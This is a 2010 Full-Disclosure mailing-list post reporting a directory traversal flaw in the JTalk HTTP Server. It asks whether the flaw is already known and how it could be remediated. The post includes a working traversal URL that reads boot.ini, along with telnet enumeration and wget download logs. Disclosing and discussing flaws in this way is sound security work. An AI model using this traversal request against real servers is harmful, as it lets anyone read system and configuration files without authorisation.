[<prev] [next>] [day] [month] [year] [list]
Message-ID: <AANLkTimmlowX7IgqT7qbBLuwiTHsMrLXnEqgIMpR7Zmg@mail.gmail.com>
Date: Thu, 1 Jul 2010 02:26:29 +0530
From: rapper crazy <rappercrazzy@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Directory Traversal on JTalk HTTP Server
Hello All,
Does anyone know of any Directory Traversal issue with Jtalk HTTP server?
I was testing one of my machine and found directory traversal on it.
http://192.168.10.120/.../.../.../.../.../.../.../.../.../boot.ini
Tried to enumerate the version but failed, attached below are the logs -
=============Header enumeration=============
[jt@...Box]$ telnet 192.168.10.120 80
Trying 192.168.10.120...
Connected to 192.168.10.120 (192.168.10.120).
Escape character is '^]'.
GET / HTTP/1.0
HTTP/1.0 404 Not Found
Server: JTALKServer
Allow: GET
Content-Type: text/html
Content-Length:87
<HTML>
<HEAD>
</HEAD>
<BODY>
<H1>HTTP Error 404</H1>
<H4>Not Found</H4>
</BODY>
</HTML>Connection closed by foreign host.
==============End Header Enumeration===============
Attached below are the logs for wget when I downloaded the boot.ini file
=========wget logs==============
[jt@...Box]$ wget
http://192.168.10.120/.../.../.../.../.../.../.../.../.../boot.ini
--2010-06-30 15:58:45--
http://192.168.10.120/.../.../.../.../.../.../.../.../.../boot.ini
Connecting to 192.168.10.120:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 208 [application/octet-stream]
Saving to: `boot.ini'
100%[====================================================================================================================>]
208 --.-K/s in 0s
2010-06-30 15:58:45 (10.9 MB/s) - `boot.ini' saved [208/208]
[jt@...Box]$ cat boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Standard"
/noexecute=optout /fastdetect
[jt@...Box]$
============end of logs=====================
So my question is does anyone know of any such issue? What could be the
remediation apart from disabling the service?
Thanks
Joshua
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists